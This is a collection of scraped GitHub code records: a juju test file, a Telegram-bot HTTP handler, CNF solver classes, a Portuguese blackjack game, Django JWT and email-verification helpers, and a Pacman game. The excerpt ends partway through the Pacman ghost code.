\"2.0-rc1\"),\n (\"juju-2.0.1-arch-series.tgz\", \"2.0\"),\n (\"juju-2.0.1-arch-series.tgz\", \"2.0.2\"),\n (\"juju-2.1-beta1-arch-series.tgz\", \"2.1-beta\"),\n (\"juju-1.25-win-x86.tgz\", \"1.25.0\")]:\n with self.assertRaises(JujuAssertionError):\n assert_file_version_matches_agent_version(\n version[0], version[1])\n\n\nclass TestAgentVersion(TestCase):\n def test_get_agent_version(self):\n for version in [(\"1.25-arch-series\", \"1.25\"),\n (\"2.0-rc2-arch-series\", \"2.0-rc2\"),\n (\"2.0.2-rc2-arch-series\", \"2.0.2-rc2\"),\n (\"2.1-beta12-arch-series\", \"2.1-beta12\"),\n (\"2.1.1-beta1-arch-series\", \"2.1.1-beta1\"),\n (\"2.0-arch-series\", \"2.0\"),\n (\"2.0.1-arch-series\", \"2.0.1\")]:\n client = fake_juju_client(version=version[0])\n agent_version = get_agent_version(client)\n self.assertEquals(agent_version, version[1])\n\n\nclass TestVerifyAgentTools(TestCase):\n def test_doesnt_raise_on_match_version(self):\n with patch.object(os, 'listdir') as lstdir:\n lstdir.return_value = [\n 'juju-2.0.1-centos7-amd64.tgz',\n 'juju-2.0.1-precise-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.tgz']\n verify_agent_tools(\"/path/to/agentsfiles\", \"2.0.1\")\n self.assertIn(\"juju sync-tool verification done successfully\",\n self.log_stream.getvalue())\n\n def test_ignores_none_tgz_files_on_verify_agent_tool(self):\n juju_bin_ver = \"2.0.1\"\n with patch(\"assess_juju_sync_tools.\"\n \"assert_file_version_matches_agent_version\") as asm:\n with patch.object(os, 'listdir') as lstdir:\n lstdir.return_value = [\n 'juju-2.0.1-centos7-amd64.tgz',\n 'juju-2.0.1-precise-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.txt']\n verify_agent_tools(\"/path/to/agentsfiles\", juju_bin_ver)\n calls = [call('juju-2.0.1-centos7-amd64.tgz', juju_bin_ver),\n call('juju-2.0.1-precise-amd64.tgz', juju_bin_ver),\n call('juju-2.0.1-win2016-amd64.tgz', juju_bin_ver)]\n self.assertEquals(asm.call_count, 3)\n self.assertListEqual(asm.call_args_list, calls)\n\n def test_raise_assertion_on_mismatch_version(self):\n juju_bin_ver = \"2.0.1\"\n with patch.object(os, 'listdir') as lstdir:\n lstdir.return_value = [\n 'juju-2.0.2-centos7-amd64.tgz',\n 'juju-2.0.1-precise-amd64.tgz',\n 'juju-2.0.1-win2016-amd64.tgz']\n with self.assertRaises(JujuAssertionError):\n verify_agent_tools(\"foo\", juju_bin_ver)\n","repo_name":"juju/1.25-upgrade","sub_path":"juju2/acceptancetests/tests/test_assess_juju_sync_tools.py","file_name":"test_assess_juju_sync_tools.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1962081719","text":"\"\"\"This script contains simple Telegram Bot which sends messages to Telegram\"\"\"\n\nfrom urllib.parse import urljoin\n\nimport requests\n\nfrom application.my_handler import MyHandler\nfrom application.utils import unjsonify, generate_token\nfrom settings import get_service_url\n\n\nclass AppHandler(MyHandler):\n _chats = {}\n _tokens = {}\n\n def _make_error_response(self):\n self.make_response(code=400, headers=dict({'Content-Type': 'application/json'}),\n json={'error': 'bad request'})\n\n def do_GET(self):\n if self.path == '/':\n self.make_response(code=200, headers=dict({'Content-Type': 'application/json'}),\n json={'hello': 'client', \"I'm\": 'application'})\n else:\n self._make_error_response()\n\n def do_POST(self):\n if self.path == '/send':\n try:\n content_length = int(self.headers['Content-Length'])\n post_data = self.rfile.read(content_length)\n obj = 
unjsonify(post_data)\n                token = obj['token']\n                message = str(obj['message'])\n                headers = {}\n                if 'Authorization' in self.headers:\n                    headers['Authorization'] = self.headers['Authorization']\n                response = requests.post(urljoin(get_service_url(), '/sendMessage'),\n                                         headers=headers,\n                                         json={'chat_id': self._chats[token],\n                                               'text': message})\n                self.make_response(code=response.status_code, headers=dict(response.headers),\n                                   data=response.text.encode())\n                return\n            except (ValueError, KeyError) as e:\n                print(e.__traceback__)\n                self._make_error_response()\n\n    def do_PUT(self):\n        if self.path == '/tokens':\n            try:\n                content_length = int(self.headers['Content-Length'])\n                data = self.rfile.read(content_length)\n                obj = unjsonify(data)\n                chat_id = obj['chat_id']\n                token = self._tokens.get(chat_id, None)\n                if token is None:\n                    token = generate_token()\n                    self._tokens[chat_id] = token\n                    self._chats[token] = chat_id\n                self.make_response(code=200, headers=dict({'Content-Type': 'application/json'}),\n                                   json={'token': token})\n                return\n            except (ValueError, KeyError) as e:\n                print(e.__traceback__)\n                self._make_error_response()\n","repo_name":"vessellook/2020-1-Atom-QA-Python-A-Vessellook","sub_path":"hw6/code/application/app_handler.py","file_name":"app_handler.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"40892571553","text":"import simulated\n\n\n# Class to represent a maxterm.\n# A maxterm holds a configuration entry for every variable; each entry can be in\n# one of three distinct states:\n# 0 - variable not present in maxterm\n# 1 - variable present\n# -1 - variable present and negated\nclass Maxterm:\n    # Constructor of maxterm\n    def __init__(self, number_of_variables):\n        self.number_of_variables = number_of_variables\n        self.configuration = [0] * (number_of_variables + 1) # configuration[0] is a dummy for a cleaner code\n        self.configuration[0] = -420\n\n    # Set a variable given as a signed number, e.g. -3 means variable 3 negated\n    def set(self, variable):\n        if abs(variable) > self.number_of_variables:  # valid variables are 1..number_of_variables\n            print(\"Could not set a variable not present for this instance!\")\n            return False\n\n        if variable >= 1:\n            # Set to 1 -- Variable is present\n            self.configuration[variable] = 1\n        elif variable <= -1:\n            # Set to -1 -- Variable is present AND NEGATED\n            self.configuration[abs(variable)] = -1\n        else:\n            print(\"Found zero. This should be the end of the line.\")\n            return False\n\n        # print(self.configuration)\n\n        return True\n\n    # For listing things inside instance\n    def __repr__(self):\n        complete_string = \"(\"\n        first = True\n        for i in range(0, self.number_of_variables + 1):\n            if self.configuration[i] == 1:\n                if first:\n                    complete_string += \"%d\" % (i)\n                    first = False\n                    continue\n                complete_string += \" ∨ %d\" % (i)\n            elif self.configuration[i] == -1:\n                if first:\n                    complete_string += \"¬%d\" % (i)\n                    first = False\n                    continue\n                complete_string += \" ∨ ¬%d\" % (i)\n\n        complete_string += \")\"\n        return complete_string\n\n    # Is the maxterm satisfied?\n    def isSatisfiedWith(self, configuration):\n        result = False\n\n        j = -1\n        for variable in self.configuration:\n            j += 1\n            if (variable == -420) or (variable == 0):\n                continue\n            elif variable == 1:\n                # print(\"%r or %r\" % (configuration[j], result))\n                result = configuration[j] or result\n            elif variable == -1:\n                # print(\"%r or %r\" % (not configuration[j], result))\n                result = (not configuration[j]) or result\n\n        return result\n\n    # Return Maxterm variables\n    def getVars(self):\n        vars_of_maxterm = set()\n        j = -1\n        for var in self.configuration:\n            j += 1\n            if (var == -420) or (var == 0):\n                continue\n            elif (var == 1) or (var == -1):\n                # print(\"Adding %d to set.\" % (j))\n                vars_of_maxterm.add(j)\n\n        return vars_of_maxterm\n\n\nclass CNFInstance:\n    # Constructor of CNFInstance\n    def __init__(self, id, number_of_variables):\n        self.id = id\n        self.number_of_variables = number_of_variables\n        self.expecting_maxterms = -1\n        self.number_of_maxterms = 0\n        self.number_of_weights_set = 0\n\n        self.weight_of_variables = [-1] * (\n            number_of_variables + 1) # weight_of_variables[0] is a dummy for cleaner code\n        self.weight_of_variables[0] = -420\n        self.maxterm_array = []\n\n        self.best_weight = -1\n        self.best_solution = [-420] # Dummy on the [0] for consistency\n        self.solved = False\n        self.time = 0\n        self.given_best_weight = -1\n        self.given_best_solution = [-420] # Dummy on the [0] for consistency\n\n    def addMaxterm(self, maxterm):\n        if maxterm.number_of_variables != self.number_of_variables:\n            print(\"Could not add a maxterm with a different number of variables!\")\n            return False\n        self.maxterm_array.append(maxterm)\n        self.number_of_maxterms += 1\n        return True\n\n    def setWeight(self, variable, weight):\n        self.weight_of_variables[variable] = weight\n        self.number_of_weights_set += 1\n        return\n\n    # For printing the instance\n    def __str__(self):\n        return \"=== CNF Instance nr.%d ===\\n\" \\\n               \"Variables = %d\\n\" \\\n               \"Weights = %s\\n\" \\\n               \"Maxterm array = %s\\n\" \\\n               \"Best weight = %d\\n\" \\\n               \"Best solution = %s\" % (\n            self.id, self.number_of_variables, self.weight_of_variables, self.maxterm_array, self.best_weight,\n            self.best_solution)\n\n    # Simulated annealing\n    solve_sim = simulated.solve_sim\n","repo_name":"Smidra/KOP-ukol-5","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"29738179814","text":"# Simples jogo de Blackjack\n\nimport random\n\nclass Carta:\n    naipes = {\"P\": \"Paus\", \n              \"O\": \"Ouros\", \n              \"E\": \"Espadas\", \n              \"C\": \"Copas\"}\n    \n    valores = (False, \"Ás\", \"2\", \n               \"3\", \"4\", \"5\", \"6\", \n               \"7\", \"8\", \"9\", \"10\",\n               \"Valete\", \"Dama\", \"Rei\")\n\n    def __init__(self, naipe_carta: str, valor_carta: int):\n        self.n = naipe_carta\n        self.v = valor_carta\n    \n    def obter_valor(self) -> int:\n        if (self.v < 11):\n
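            # Added note: face cards (v = 11..13) all count ten here; the ace (v = 1) is\n            # re-valued to 1 or 11 later, in atualizar_pontos. For instance:\n            #     Carta('C', 12).obter_valor() == 10\n            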
return self.v\n else:\n return 10\n\n def __str__(self) -> str:\n return self.valores[self.v]+ \" de \" + self.naipes[self.n] \n \n\nclass Baralho:\n def __init__(self):\n self.criar_cartas()\n self.num_cartas = len(self.cartas)\n \n def criar_cartas(self):\n self.cartas = []\n naipes = ('P', 'O', 'E', 'C')\n\n for n in naipes: # Paus, Ouros, Espadas, Copas\n for v in range(1, 14): # Ás, 2, ..., 10, Valete, Dama, Rei\n self.cartas.append(Carta(n, v))\n \n def retirar_carta(self):\n n = random.randint(0, self.num_cartas-1)\n carta = self.cartas.pop(n)\n self.num_cartas -= 1\n return carta\n\n\nclass Jogador:\n def __init__(self):\n self.montante = self.pedir_montante_inicial()\n self.cartas = []\n self.pontos = 0\n self.aposta = 0\n self.retirar = True\n\n def pedir_montante_inicial(self):\n return float(input(\"\\nQual o teu montante inicial? \"))\n\n def acrescentar_dinheiro(self, valor):\n self.montante += valor\n\n def retirar_dinheiro(self, valor):\n self.montante -= valor\n \n def pedir_valor_aposta(self):\n aposta = int(input(\"\\nVamos começar uma rodada. Qual o valor da tua aposta? \"))\n\n while (aposta > self.montante):\n aposta = int(input(\"\\nNão tens montante suficiente. Qual o valor da tua aposta? \"))\n\n self.retirar_dinheiro(aposta)\n self.aposta = aposta\n\n return aposta\n \n def adicionar_carta(self, c):\n if (self.retirar):\n print(\"\\n-> Tu foste buscar uma carta.\")\n self.cartas.append(c)\n self.atualizar_pontos()\n else:\n print(\"\\n-> Não foste buscar nenhuma carta.\")\n \n def atualizar_pontos(self):\n pontos = 0\n num_ases = 0\n # pontuação sem ases\n for c in self.cartas:\n if (c.obter_valor() == 1):\n num_ases += 1\n else:\n pontos += c.obter_valor() \n \n # verificar pontuação dos ases \n if (num_ases > 0 and pontos + 11 + num_ases-1 <= 21):\n pontos += 11 + num_ases-1\n \n else:\n pontos += num_ases\n \n self.pontos = pontos\n \n def terminar_rodada(self):\n self.cartas = []\n self.pontos = 0\n self.aposta = 0\n self.retirar = True\n \n def __str__(self):\n string = \"\\n-- As tuas cartas --\\n\" \n for c in self.cartas:\n string += '** '\n string += c.__str__() \n string += ' **\\n'\n \n return string[:-1]\n \n \nclass Dealer:\n def __init__(self):\n self.cartas = []\n self.pontos = 0\n self.retirar = True\n\n def adicionar_carta(self, c):\n if (self.retirar):\n if (self.pontos < 18):\n print(\"\\n-> O dealer foi buscar uma carta.\") \n self.cartas.append(c)\n self.atualizar_pontos()\n else: \n print(\"\\n-> O dealer não foi buscar nenhuma carta.\")\n self.retirar = False\n \n def atualizar_pontos(self):\n pontos = 0\n num_ases = 0\n # pontuação sem ases\n for c in self.cartas:\n if (c.obter_valor() == 1):\n num_ases += 1\n else:\n pontos += c.obter_valor() \n \n # verificar pontuação dos ases\n if (num_ases > 0 and pontos + 11 + num_ases-1 <= 21):\n pontos += 11 + num_ases-1\n \n else:\n pontos += num_ases\n \n self.pontos = pontos\n \n def revelar_baralho(self):\n string = \"\\n-- Cartas que o dealer tinha --\\n\" \n for c in self.cartas:\n string += '** '\n string += c.__str__() \n string += ' **\\n'\n \n return string[:-1]\n \n def __str__(self):\n string = \"\\n-- Cartas do dealer --\\n\" \n for c in self.cartas[1:]:\n string += '** '\n string += c.__str__() \n string += ' **\\n'\n string += \"** CARTA SECRETA **\\n\"\n \n return string[:-1]\n \n\nclass Rodada:\n def __init__(self, aposta: int, jogador: Jogador):\n self.aposta = aposta\n self.jogador = jogador\n self.dealer = Dealer()\n self.baralho = Baralho()\n self.distribuir_cartas()\n \n def 
distribuir_cartas(self):\n # 1 carta para cada\n self.jogador.adicionar_carta(self.baralho.retirar_carta())\n self.dealer.adicionar_carta(self.baralho.retirar_carta())\n \n # 2 cartas para cada\n self.jogador.adicionar_carta(self.baralho.retirar_carta())\n self.dealer.adicionar_carta(self.baralho.retirar_carta())\n \n print(self.dealer.__str__())\n print(self.jogador.__str__())\n \n self.verificar_pontuacoes()\n \n def verificar_pontuacoes(self):\n pontos_jogador = self.jogador.pontos\n pontos_dealer = self.dealer.pontos\n \n if (pontos_jogador == 21):\n if (pontos_dealer == 21):\n self.empate()\n self.terminar_jogo()\n else:\n self.blackjack_do_jogador()\n self.terminar_jogo()\n \n elif (pontos_jogador > 21):\n if (pontos_dealer > 21):\n self.empate()\n self.terminar_jogo()\n else:\n self.dealer_venceu()\n self.terminar_jogo()\n else:\n self.tirar_mais_cartas()\n \n \n def tirar_mais_cartas(self):\n pontos_jogador = self.jogador.pontos\n\n if (self.jogador.retirar):\n resposta = input(\"\\nTens \" + str(pontos_jogador) + \" pontos. Desejas tirar mais cartas? (s, n): \")\n \n while (resposta not in ('S', 'N', 's', 'n')):\n resposta = input(\"\\nNão percebi. Desejas tirar mais cartas? (s, n): \")\n else:\n resposta = 'n'\n \n if (resposta == 'S' or resposta == 's'):\n self.nova_jogada()\n \n elif (resposta == 'N' or resposta == 'n'):\n self.jogador.retirar = False\n \n if (self.dealer.retirar):\n self.nova_jogada()\n else:\n self.verificar_vencedor()\n\n \n def empate(self):\n print(\"\\nHOUVE UM EMPATE. Vamos devolver-te o dinheiro que apostaste.\")\n self.jogador.acrescentar_dinheiro(self.aposta)\n \n def dealer_venceu(self):\n print(\"\\nO DEALER VENCEU.\")\n \n def jogador_venceu(self):\n print(\"\\nGANHASTE!!!\")\n self.jogador.acrescentar_dinheiro(2*self.aposta)\n \n def blackjack_do_jogador(self):\n print(\"\\nBLACKJACK!!! GANHASTE!!!\")\n self.jogador.acrescentar_dinheiro(2.5*self.aposta)\n \n def nova_jogada(self):\n # tirar mais uma carta\n self.jogador.adicionar_carta(self.baralho.retirar_carta())\n self.dealer.adicionar_carta(self.baralho.retirar_carta())\n \n print(self.dealer.__str__())\n print(self.jogador.__str__())\n \n self.verificar_pontuacoes()\n \n def verificar_vencedor(self):\n pontos_jogador = self.jogador.pontos\n pontos_dealer = self.dealer.pontos\n \n if (pontos_dealer > 21):\n self.jogador_venceu()\n \n elif (pontos_jogador > pontos_dealer):\n self.jogador_venceu()\n \n elif (pontos_jogador == pontos_dealer):\n self.empate()\n \n else:\n self.dealer_venceu()\n \n self.terminar_jogo()\n \n def terminar_jogo(self):\n # verificar quem venceu\n pontos_jogador = self.jogador.pontos\n pontos_dealer = self.dealer.pontos\n \n print(\"\\nO dealer ficou com\", pontos_dealer, \"pontos.\")\n print(self.dealer.revelar_baralho())\n\n print(\"\\nTu ficaste com\", pontos_jogador, \"pontos.\")\n print(self.jogador.__str__())\n \n self.jogador.terminar_rodada()\n\n\ndef blackjack():\n print(\"Bem-vindo ao jogo BLACKJACK!\")\n \n jogador = Jogador()\n\n if (jogador.montante <= 0.0):\n print(\"\\nNão tens dinheiro. :(\")\n return\n \n continuar = 1\n while (continuar):\n print(\"\\nTens\", jogador.montante, \"moedas.\")\n \n aposta = jogador.pedir_valor_aposta()\n\n Rodada(aposta, jogador)\n \n if (jogador.montante == 0):\n print(\"\\nFicaste sem dinheiro. :(\")\n break\n \n resposta = input(\"\\nQueres continuar a jogar? (s, n): \")\n \n while (resposta not in ['S', 'N', 's', 'n']):\n resposta = input(\"\\nNão percebi. Queres continuar a jogar? 
(s, n): \")\n \n if (resposta == 'S' or resposta == 's'):\n continuar = 1\n elif (resposta == 'N' or resposta == 'n'):\n continuar = 0\n \n print(\"\\nFim do jogo!\\n\")\n \n\nif __name__ == \"__main__\":\n\n blackjack()\n ","repo_name":"manuel-dev04/recrutamento-22-23-2semestre","sub_path":"python/AdrianaNunes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9704,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"17072621472","text":"from django.utils.decorators import wraps\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string, get_template\nfrom django.template import Context\nfrom django.contrib import messages\nfrom cycloan.settings import SECRET_KEY\nfrom django.core.mail import EmailMultiAlternatives, send_mail\n\nfrom datetime import datetime, timedelta\nimport jwt\n\n\ndef verify_auth_token(func):\n @wraps(func)\n def wrapped(self, request, *args, **kwargs):\n auth_token = request.session.get('auth_token')\n\n if not auth_token:\n messages.warning(request, 'Session expired. Please log in again.')\n return redirect('index-view')\n \n try:\n auth_data = jwt.decode(auth_token, SECRET_KEY, algorithms=['HS256'])\n except:\n messages.warning(request, 'Session expired. Please log in again.')\n return redirect('index-view')\n\n return func(self, request, *args, **kwargs)\n \n return wrapped\n\n\ndef create_auth_token(user_id):\n auth_token = jwt.encode(\n {\n 'user_id': user_id,\n 'exp': datetime.now() + timedelta(seconds=600000)\n }, SECRET_KEY, algorithm='HS256'\n ).decode('utf-8')\n return auth_token\n\n\ndef check_customer(func):\n @wraps(func)\n def wrapped(self, request, *args, **kwargs):\n \n if request.session.get('user_type') == 'owner':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n elif request.session.get('user_type') == 'admin':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n\n return func(self, request, *args, **kwargs)\n return wrapped\n\n\ndef check_owner(func):\n @wraps(func)\n def wrapped(self, request, *args, **kwargs):\n \n if request.session.get('user_type') == 'customer':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n elif request.session.get('user_type') == 'admin':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n\n return func(self, request, *args, **kwargs)\n return wrapped\n\n\ndef create_verification_token(user_type, user_email, token_expiry):\n\n token = jwt.encode(\n {\n 'user_type': user_type,\n 'user_email': user_email,\n 'token_expiry': str(token_expiry)\n }, SECRET_KEY, algorithm='HS256'\n ).decode('utf-8')\n\n return token\n\n\ndef send_verification_email(to, user_name, user_type, verification_token):\n\n site_address = \"http://localhost:8000/\"\n verification_link = \"\".join([ site_address, \"email-verification/\", verification_token ]) \n\n context = {\n 'receiver_name': user_name,\n 'receiver_type': user_type,\n 'verification_link': verification_link\n }\n\n # html_content = render_to_string('email.html', context)\n html_content = get_template('core/email.html').render(context)\n text_content = str(html_content)\n\n subject = \"[CYCLOAN] Verify your email\"\n from_email = 'rabid@dhaka-ai.com'\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, 
\"text/html\")\n msg.send(fail_silently=False)\n\n # send_mail(\n # subject=\"Verify account\",\n # message=text_content,\n # from_email=from_email,\n # recipient_list=[to],\n # fail_silently=False,\n # html_message=html_content\n # )\n\n\n","repo_name":"fazledyn/cycloan","sub_path":"webapp/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12252440144","text":"import random\r\nimport pygame.time\r\nfrom algs import *\r\nfrom data_structures import *\r\nfrom settings import *\r\nfrom misc_classes import *\r\n\r\n\r\n\r\n\r\nclass Pacman(object):\r\n def __init__(self, node):\r\n '''\r\n :param node:\r\n '''\r\n self.colour = YELLOW\r\n self.radius = TILE_WIDTH // 2 # diameter fits into each individual tile which is 2r\r\n self.node = node # delegated as the parameter 'node' so that Pacman's position can be updated due to player input accordingly.\r\n self.pos = self.node.pos\r\n self.curr_direction = LEFT\r\n self.last_direction = self.curr_direction\r\n self.sheet_index = 0\r\n self.drawing_delay = 0\r\n\r\n\r\n\r\n def input(self):\r\n '''\r\n :return:\r\n '''\r\n keys = pygame.key.get_pressed() # check arrow keys or WASD for if they are pressed, return direction corresponding to each arrow key / WASD, if no keys are pressed return STOP (no movement\r\n if keys[pygame.K_RIGHT] or keys[pygame.K_d]:\r\n self.curr_direction = RIGHT # changes the current direction so that the pacman will continue to move in the same direction if there is no new key press. This matches real gameplay :)\r\n elif keys[pygame.K_LEFT] or keys[pygame.K_a]:\r\n self.curr_direction = LEFT\r\n elif keys[pygame.K_DOWN] or keys[pygame.K_s]:\r\n self.curr_direction = DOWN\r\n elif keys[pygame.K_UP] or keys[pygame.K_w]:\r\n self.curr_direction = UP\r\n return self.curr_direction # continues to move if no different key press..\r\n\r\n\r\n\r\n def update(self, generated_maze=False):\r\n '''\r\n :return:\r\n '''\r\n self.input()\r\n self.node = self.get_target_node(self.curr_direction, generated_maze)\r\n self.pos = self.node.pos\r\n\r\n if self.valid_direction(self.curr_direction, generated_maze):\r\n self.last_direction = self.curr_direction\r\n\r\n # update the new position of the player as the adjacent node in the direction of the player's choice.\r\n\r\n def draw(self, window):\r\n '''\r\n :param window:\r\n :return:\r\n '''\r\n center = (self.pos.x, self.pos.y - 4)\r\n self.drawing_delay += 1\r\n\r\n if self.sheet_index > 2:\r\n self.sheet_index = 0\r\n\r\n\r\n if self.last_direction == LEFT:\r\n window.blit(pacman_movingleft_sheet[self.sheet_index], center)\r\n\r\n\r\n elif self.last_direction == RIGHT:\r\n window.blit(pacman_movingright_sheet[self.sheet_index], center)\r\n\r\n\r\n elif self.last_direction == UP:\r\n window.blit(pacman_movingup_sheet[self.sheet_index], center)\r\n\r\n\r\n elif self.last_direction == DOWN:\r\n window.blit(pacman_movingdown_sheet[self.sheet_index], center)\r\n\r\n\r\n\r\n if self.drawing_delay > 3:\r\n self.sheet_index += 1\r\n self.drawing_delay = 0\r\n\r\n\r\n\r\n\r\n\r\n #return pygame.draw.circle(window, self.colour, center, self.radius)\r\n\r\n def valid_direction(self, direction, generated_maze): # validate the player's movement\r\n '''\r\n :param direction:\r\n :return:\r\n '''\r\n if direction is not STOP:\r\n if not generated_maze:\r\n if self.node.adjacent_nodes[direction] is not None: # if the player presses the arrow keys or WASD\r\n 
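# Added note: the hand-built level is a node graph, so a legal move is simply an\r\n                    # existing edge, while the generated maze stores per-cell walls instead:\r\n                    #     node graph : self.node.adjacent_nodes[direction] -> Node or None\r\n                    #     cell grid  : self.node.walls[direction]         -> truthy when open\r\n                    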
return True\r\n else:\r\n if self.node.walls[direction]: #CHECKS IF THERE ISNT A WALL IN THE WAY WHEN CONSIDERING MOVING THROUGH CELLS IN THE GENERATED MAZE.\r\n return True\r\n\r\n return False\r\n\r\n\r\n def get_target_node(self, direction, generated_maze):\r\n '''\r\n\r\n :param direction:\r\n :return:\r\n '''\r\n if self.valid_direction(direction, generated_maze): # if the player moves in a valid direction\r\n return self.node.adjacent_nodes[direction] # return the node that it is moving to as it new position\r\n\r\n elif self.valid_direction(self.last_direction, generated_maze):\r\n return self.node.adjacent_nodes[self.last_direction]\r\n\r\n else:\r\n return self.node\r\n\r\n\r\n\r\nclass Ghost(object):\r\n def __init__(self, node):\r\n '''\r\n :param node:\r\n :param frightened_sheet:\r\n :param eaten_sheet:\r\n '''\r\n self.colour = None\r\n self.node = node\r\n self.orientation = UP\r\n self.pos = self.node.pos\r\n self.modes = {'frightened': False, 'chase': False, 'scatter': False, 'eaten': False}\r\n self.directions = [UP, DOWN, LEFT, RIGHT, STOP]\r\n\r\n def reset_mode(self, curr):\r\n '''\r\n\r\n :param curr:\r\n :return:\r\n '''\r\n if curr == 1:\r\n update_dict = {'chase': True, 'frightened': False, 'scatter': False, 'eaten': False}\r\n self.modes.update(update_dict)\r\n\r\n elif curr == 2: # scatter\r\n update_dict = {'chase': False, 'frightened': False, 'scatter': True, 'eaten': False}\r\n self.modes.update(update_dict)\r\n\r\n elif curr == 3: # frightened\r\n update_dict = {'chase': False, 'frightened': True, 'scatter': False, 'eaten': False}\r\n self.modes.update(update_dict)\r\n\r\n elif curr == 4: # eaten\r\n update_dict = {'chase': False, 'frightened': False, 'scatter': False, 'eaten': True}\r\n self.modes.update(update_dict)\r\n\r\n\r\n def get_direction(self, target): # implementation of greedy best-first search for original ghost pathfinding\r\n '''\r\n :param target:\r\n :return:\r\n '''\r\n self.direction_list = [d for d in self.directions if self.valid_direction(d) and d != (self.orientation * -1)]\r\n directions = {direction: distance(self.node.adjacent_nodes[direction], target) for direction in self.direction_list}\r\n\r\n mins = [k for k, v in directions.items() if v == min(directions.values())] # creates a list of minimising directions (in terms of distance to target node) in the edge case there are multiple min values by selecting all the directions with the smallest distance and entering that into a list using list comprehension\r\n\r\n\r\n if UP in mins:\r\n self.orientation = UP # order of directions prioritised in the case there are multiple minimising directions (UP, LEFT, DOWN, RIGHT)\r\n return UP\r\n\r\n elif LEFT in mins:\r\n self.orientation = LEFT\r\n return LEFT\r\n\r\n elif DOWN in mins:\r\n self.orientation = DOWN\r\n return DOWN\r\n\r\n elif RIGHT in mins:\r\n self.orientation = RIGHT\r\n return RIGHT\r\n\r\n else:\r\n return STOP\r\n\r\n def chase(self, target): # need to find all calls of chase, scatter and frightened and pass temp_time, current_time or pygame.time.get_ticks()\r\n self.node = self.node.adjacent_nodes[self.get_direction(target)]\r\n self.pos = self.node.pos\r\n\r\n def scatter(self, home_node):\r\n self.node = self.node.adjacent_nodes[self.get_direction(home_node)]\r\n self.pos = self.node.pos\r\n\r\n def frightened(self):\r\n d = random.choice([d for d in self.directions if self.valid_direction(d) and d != (self.orientation * -1)])\r\n self.orientation = d\r\n self.node = self.node.adjacent_nodes[d]\r\n self.pos = 
self.node.pos\r\n\r\n def eaten(self):\r\n base = Node(14, 13)\r\n self.chase(base)\r\n if self.node.pos == base.pos:\r\n self.reset_mode(1)\r\n\r\n def collision(self, target):\r\n if self.pos == target.pos:\r\n return True\r\n return False\r\n\r\n def valid_direction(self, direction): #UPDATE THIS FOR CELLS.\r\n if direction is not STOP and self.node.adjacent_nodes[direction] is not None:\r\n return True\r\n return False\r\n\r\n\r\n def draw(self, window, sheet, frightened_nearly_up=False):\r\n position = (self.pos.x, self.pos.y - 2)\r\n if self.modes['chase'] == True or self.modes['scatter'] == True:\r\n if self.orientation == RIGHT:\r\n window.blit(sheet[0], position)\r\n\r\n elif self.orientation == LEFT:\r\n window.blit(sheet[1], position)\r\n\r\n elif self.orientation == UP:\r\n window.blit(sheet[2], position)\r\n\r\n elif self.orientation == DOWN:\r\n window.blit(sheet[3], position)\r\n\r\n\r\n elif self.modes['frightened'] == True:\r\n if not frightened_nearly_up: # need to edit with a timer to show flashing ghost when frightened nearly up\r\n window.blit(frightened_sheet[0], position)\r\n else:\r\n window.blit(frightened_sheet[1], position)\r\n\r\n elif self.modes['eaten'] == True:\r\n if self.orientation == RIGHT:\r\n window.blit(eaten_sheet[0], position)\r\n\r\n elif self.orientation == LEFT:\r\n window.blit(eaten_sheet[1], position)\r\n\r\n elif self.orientation == UP:\r\n window.blit(eaten_sheet[2], position)\r\n\r\n elif self.orientation == DOWN:\r\n window.blit(eaten_sheet[3], position)\r\n\r\n\r\n def draw_points(self, window, points, wall_colour):\r\n colours = [GREEN, RED, BLUE, PINK]\r\n if wall_colour in colours:\r\n del colours[colours.index(wall_colour)]\r\n colour = random.choice(colours) # random colour selection for bonus points\r\n print(points)\r\n points_text = pygame.font.SysFont('arial', 15).render(f\"{str(points)}\", True, colour)\r\n points_rect = points_text.get_rect(center=(self.pos.x + 10, self.pos.y - 10))\r\n\r\n window.blit(points_text, points_rect)\r\n\r\n\r\n\r\n\r\nclass Blinky(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Blinky'\r\n self.colour = RED\r\n self.orientation = UP\r\n self.home = Node(0, COLUMNS - 1)\r\n self.reset_mode(2)\r\n self.sheet = blinky_sheet\r\n\r\n def update(self, player):\r\n if self.modes['chase']:\r\n self.chase(player.node)\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n\r\n\r\n\r\nclass Pinky(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Pinky'\r\n self.colour = PINK\r\n self.orientation = LEFT\r\n self.home = Node(0, 0)\r\n self.sheet = pinky_sheet\r\n self.reset_mode(2)\r\n\r\n\r\n\r\n def update(self, player):\r\n if self.modes['chase']:\r\n if player.curr_direction == UP:\r\n self.chase(Node(player.node.row - 4,player.node.col)) # for some reason allocating all this redundant code into a method doesnt work?\r\n elif player.curr_direction == DOWN:\r\n self.chase(Node(player.node.row + 4, player.node.col))\r\n elif player.curr_direction == LEFT:\r\n self.chase(Node(player.node.row, player.node.col - 4))\r\n elif player.curr_direction == RIGHT:\r\n self.chase(Node(player.node.row, player.node.col + 